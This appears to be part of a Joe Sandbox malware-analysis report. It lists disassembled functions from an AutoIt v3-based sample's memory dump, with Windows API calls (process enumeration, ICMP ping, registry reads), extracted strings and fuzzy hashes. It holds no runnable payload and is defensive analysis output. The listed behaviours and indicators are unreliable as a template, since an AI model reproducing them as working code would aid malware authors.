                                                                  • CloseHandle.KERNEL32(00000000), ref: 0068DE87
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 2a695b14448834a9d4b7317f90574b76e5dc197ed035279f274b80fefefc0400
                                                                  • Instruction ID: 422f7e8dabeb7fa7bee7102c7ff3af4b1446fa42cded81e3e8572e3f0ae5657d
                                                                  • Opcode Fuzzy Hash: 2a695b14448834a9d4b7317f90574b76e5dc197ed035279f274b80fefefc0400
                                                                  • Instruction Fuzzy Hash: 393184711087019FD310EF54DC85AAFBBEAEF99350F040A2DF581871A1EB71A949CFA2

                                                                  Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4k$@k$Pk$`*o$`k$d0b$d10m0$d1b$d1r0,2$d5m0$e#o$i$tk$tk$(o$(o$(o$(o$k$k
                                                                  • API String ID: 0-1517538552
                                                                  • Opcode ID: 910ace140b4fb243b8c176eb2f0cee41b7e9c4e5b53fec806d8ab23f3dac0d82
                                                                  • Instruction ID: 199398e98e31a80aaf348ecdc3f82008e588d932615c04f94e9406763a1b96ec
                                                                  • Opcode Fuzzy Hash: 910ace140b4fb243b8c176eb2f0cee41b7e9c4e5b53fec806d8ab23f3dac0d82
                                                                  • Instruction Fuzzy Hash: 166227B05083419FC768DF14C099AEABBE2FF88304F14896EE5998B351DB71D985CF82

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00623657
                                                                  • RegisterClassExW.USER32(00000030), ref: 00623681
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623692
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 006236AF
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006236BF
                                                                  • LoadIconW.USER32(000000A9), ref: 006236D5
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006236E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$0+m"b$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-2385080849
                                                                  • Opcode ID: 1cbbc87d74275f88054ba533df1cc196f886a829a7434fa2528b2d6e6c0d0fad
                                                                  • Instruction ID: 6c10148a5fc551b799384e4f281cd3a62c5d62338aef4c7ca073208671764dd1
                                                                  • Opcode Fuzzy Hash: 1cbbc87d74275f88054ba533df1cc196f886a829a7434fa2528b2d6e6c0d0fad
                                                                  • Instruction Fuzzy Hash: FF21EAB1D0121AAFDB00DF95E889ADD7BB6FB08710F00611AF515AB2A0E7B54580CF50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00623709,?,?), ref: 00623777
                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00623709,?,?), ref: 006237A3
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006237C6
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00623709,?,?), ref: 006237D1
                                                                  • CreatePopupMenu.USER32 ref: 006237E5
                                                                  • PostQuitMessage.USER32(00000000), ref: 00623806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: 0$o$0$o$TaskbarCreated
                                                                  • API String ID: 129472671-1445687470
                                                                  • Opcode ID: d19d4590bf0bf4e036aaf4f798367bcd2f4da360e8ec66adc52d69fdc6a83886
                                                                  • Instruction ID: c57f6e7f719b2a492a21e8fddcb5b969b9d9eace71e49ba6d5dcfefedd586f5c
                                                                  • Opcode Fuzzy Hash: d19d4590bf0bf4e036aaf4f798367bcd2f4da360e8ec66adc52d69fdc6a83886
                                                                  • Instruction Fuzzy Hash: 2541D5F1244A76BADF142B28AC69BF93B67E705300F004229F5018E390DBBD9B45DF69

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0066071A: CreateFileW.KERNEL32(00000000,00000000,?,00660A84,?,?,00000000,?,00660A84,00000000,0000000C), ref: 00660737
                                                                  • GetLastError.KERNEL32 ref: 00660AEF
                                                                  • __dosmaperr.LIBCMT ref: 00660AF6
                                                                  • GetFileType.KERNEL32(00000000), ref: 00660B02
                                                                  • GetLastError.KERNEL32 ref: 00660B0C
                                                                  • __dosmaperr.LIBCMT ref: 00660B15
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00660B35
                                                                  • CloseHandle.KERNEL32(?), ref: 00660C7F
                                                                  • GetLastError.KERNEL32 ref: 00660CB1
                                                                  • __dosmaperr.LIBCMT ref: 00660CB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID: H
                                                                  • API String ID: 4237864984-2852464175
                                                                  • Opcode ID: e59576c22b7adbbb13ae55eac0201728fe0aff5681fea5762d00b59575bfbf7e
                                                                  • Instruction ID: ecffad4671a219aa271c77ccca5844f88583f0e97e3a5caa632074de75c9bb2e
                                                                  • Opcode Fuzzy Hash: e59576c22b7adbbb13ae55eac0201728fe0aff5681fea5762d00b59575bfbf7e
                                                                  • Instruction Fuzzy Hash: E0A11532A141488FEF19AF68D852BAE7BE2AB06324F14016DF811DF3D2D7319D16CB55

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00625594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006255B2
                                                                    • Part of subcall function 00625238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0062525A
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006253C4
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00664BFD
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00664C3E
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00664C80
                                                                  • _wcslen.LIBCMT ref: 00664CE7
                                                                  • _wcslen.LIBCMT ref: 00664CF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 98802146-2727554177
                                                                  • Opcode ID: f5a11bf5ce640fede83211d320e2809839a97e822b33b07d03cd7fe44eba5c5c
                                                                  • Instruction ID: 496559ad662054c3cadfb9eeb0033fcac9372a103ee5ccda605aa2baafd74c0c
                                                                  • Opcode Fuzzy Hash: f5a11bf5ce640fede83211d320e2809839a97e822b33b07d03cd7fe44eba5c5c
                                                                  • Instruction Fuzzy Hash: 8871BEB25053619FC314EF65EC819ABBBEAFF98340F40542EF141872A0EF719A49CB95

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 006234DE
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 006234ED
                                                                  • LoadIconW.USER32(00000063), ref: 00623503
                                                                  • LoadIconW.USER32(000000A4), ref: 00623515
                                                                  • LoadIconW.USER32(000000A2), ref: 00623527
                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0062353F
                                                                  • RegisterClassExW.USER32(?), ref: 00623590
                                                                    • Part of subcall function 00623624: GetSysColorBrush.USER32(0000000F), ref: 00623657
                                                                    • Part of subcall function 00623624: RegisterClassExW.USER32(00000030), ref: 00623681
                                                                    • Part of subcall function 00623624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623692
                                                                    • Part of subcall function 00623624: InitCommonControlsEx.COMCTL32(?), ref: 006236AF
                                                                    • Part of subcall function 00623624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006236BF
                                                                    • Part of subcall function 00623624: LoadIconW.USER32(000000A9), ref: 006236D5
                                                                    • Part of subcall function 00623624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006236E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 1da109af2596d3bf602749313680d0c12d18dff41c6435cec8f2f666b7bafbce
                                                                  • Instruction ID: 8790fe1780cef42fb447f0ba4d65fe18aeee9e17047401b975d43b078fe309e9
                                                                  • Opcode Fuzzy Hash: 1da109af2596d3bf602749313680d0c12d18dff41c6435cec8f2f666b7bafbce
                                                                  • Instruction Fuzzy Hash: EF2153F2D00316ABDB109F99EC65BA97FB6FB08754F00102AF604A6360D7B94985CF90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000101,?), ref: 006A1019
                                                                  • inet_addr.WSOCK32(?), ref: 006A1079
                                                                  • gethostbyname.WS2_32(?), ref: 006A1085
                                                                  • IcmpCreateFile.IPHLPAPI ref: 006A1093
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006A1123
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006A1142
                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 006A1216
                                                                  • WSACleanup.WSOCK32 ref: 006A121C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 1ecd367b0e954f46d7848ff7f0bd7fce4f6587d4a2225c730b9c143450f7b12e
                                                                  • Instruction ID: cff1c33be699caf32c5dc21a03b7aa095ff66e5ba963b43c3d8411a5fef24c66
                                                                  • Opcode Fuzzy Hash: 1ecd367b0e954f46d7848ff7f0bd7fce4f6587d4a2225c730b9c143450f7b12e
                                                                  • Instruction Fuzzy Hash: 39919F716042419FD720EF19C884F56BBE2AF46318F1485A9F5658F7A2C731ED85CF81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Variable must be of type 'Object'.$t5o$t5o$t5o$t5o$t5ot5o
                                                                  • API String ID: 0-1618798684
                                                                  • Opcode ID: abf2dc358c9375f27667621cde3470a2ae626a67b39c36897e06e38379359cf9
                                                                  • Instruction ID: 6023e27b9de329e2792f15886b601b8e446812288d096b37164c1b1a9b28a861
                                                                  • Opcode Fuzzy Hash: abf2dc358c9375f27667621cde3470a2ae626a67b39c36897e06e38379359cf9
                                                                  • Instruction Fuzzy Hash: B1C28C71A00625DFDB24CF98D890AADB7B2FF08310F248579E94AAB391D775AD41CF90
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006315F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: t5o$t5o$t5o$t5o$t5ot5o
                                                                  • API String ID: 1385522511-4068516949
                                                                  • Opcode ID: d0cf52202e6adb9ed442222ccc2a1b47e7524a7b2dbf44a55ee6e5a8efec38c9
                                                                  • Instruction ID: f62af0b9c7088b8b72feba78521a8a88ecebf72f4089621bc951f3493fdbc36c
                                                                  • Opcode Fuzzy Hash: d0cf52202e6adb9ed442222ccc2a1b47e7524a7b2dbf44a55ee6e5a8efec38c9
                                                                  • Instruction Fuzzy Hash: 3DB26B74A08351CFEB64CF18C490A6AB7E3BF99300F14895DE98A8B351D771ED49CB92

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006232AF
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 006232B7
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006232C2
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006232CD
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 006232D5
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 006232DD
                                                                    • Part of subcall function 00623205: RegisterWindowMessageW.USER32(00000004,?,00622964), ref: 0062325D
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00622A0A
                                                                  • OleInitialize.OLE32 ref: 00622A28
                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00663A0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID: (&o$0$o$4'o$d(o$$o
                                                                  • API String ID: 1986988660-3242521324
                                                                  • Opcode ID: 57a99eaae8bad952f88cc0d12eeed8af6cf0631f4b61a9b8ef724f7cbede3d29
                                                                  • Instruction ID: 7364fa28f2dec7a24ac6db885bbb9ff0e4aa06da84567814b0b1485f4786ed5f
                                                                  • Opcode Fuzzy Hash: 57a99eaae8bad952f88cc0d12eeed8af6cf0631f4b61a9b8ef724f7cbede3d29
                                                                  • Instruction Fuzzy Hash: F3719DB09126178F8788EF79ED796753AE3FB48344740A22ED118CB3A1EB704589DF58

                                                                   Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                   • Function range: 6590c5-659479
                                                                   • API calls in graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4cfae9c9d0755fd7dcc70cefc6a3df34789b50bd5c5b47a9e1328e4d3630630
                                                                  • Instruction ID: f12049adbd9d9387b789597cf64e43a2e75fd454731cc053c61d4c1cbe014302
                                                                  • Opcode Fuzzy Hash: f4cfae9c9d0755fd7dcc70cefc6a3df34789b50bd5c5b47a9e1328e4d3630630
                                                                  • Instruction Fuzzy Hash: C9C1D170A04249EFDF11DFA8D841BEDBBB2AF0A311F044199E954AB392C7309D4ACB75

                                                                   Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                   • Single block 6235b3-623623: CreateWindowExW x2, ShowWindow x2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006235E1
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623602
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 00623616
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 0062361F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 25170f09799a0ee76658410d451ba3601c81bb5fad3637ba981adf489615aa31
                                                                  • Instruction ID: 905b0f1443d64e7846aa5ba77f665322e0c70e60356a28df30b2adae2b848b2a
                                                                  • Opcode Fuzzy Hash: 25170f09799a0ee76658410d451ba3601c81bb5fad3637ba981adf489615aa31
                                                                  • Instruction Fuzzy Hash: 3FF03AB26042967AE7310B17AC19EB73FBFD7C6F10B00102EBA04AB160D6690881DEB0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00665287
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00626299
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                  • String ID: Line %d: $AutoIt -
                                                                  • API String ID: 2289894680-4094128768
                                                                  • Opcode ID: 646de760b472910d61aa9110f8e0eebbd621ac4d70571fa7f1a71337c3c481ee
                                                                  • Instruction ID: aeb1a352a13dc53726bd6ef62897c30692d7e8cedabc46539c1062047b7ea6b9
                                                                  • Opcode Fuzzy Hash: 646de760b472910d61aa9110f8e0eebbd621ac4d70571fa7f1a71337c3c481ee
                                                                  • Instruction Fuzzy Hash: E741D6B2408725AAC351EB60EC51EEF7BDEAF44310F00461EF98592191EF34A649CF9A

                                                                   Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                   • Function range: 658a2e-658ac9
                                                                   • Calls in graph: internal 655737, 6556a6, 64f613; CloseHandle, GetLastError
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,OVf,0065894C,?,006E9CE8,0000000C,006589AB,?,OVf,?,0066564F), ref: 00658A84
                                                                  • GetLastError.KERNEL32 ref: 00658A8E
                                                                  • __dosmaperr.LIBCMT ref: 00658AB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                  • String ID: OVf
                                                                  • API String ID: 2583163307-3434556752
                                                                  • Opcode ID: ec59a5f7bbfb4d92a73a8773237d0f4c558913bb2ad76986d350b7a4e0d2548e
                                                                  • Instruction ID: 3096b32d6bafd3685e70537095bbeba4cdc76e4c279cb73e8cff842f0534342e
                                                                  • Opcode Fuzzy Hash: ec59a5f7bbfb4d92a73a8773237d0f4c558913bb2ad76986d350b7a4e0d2548e
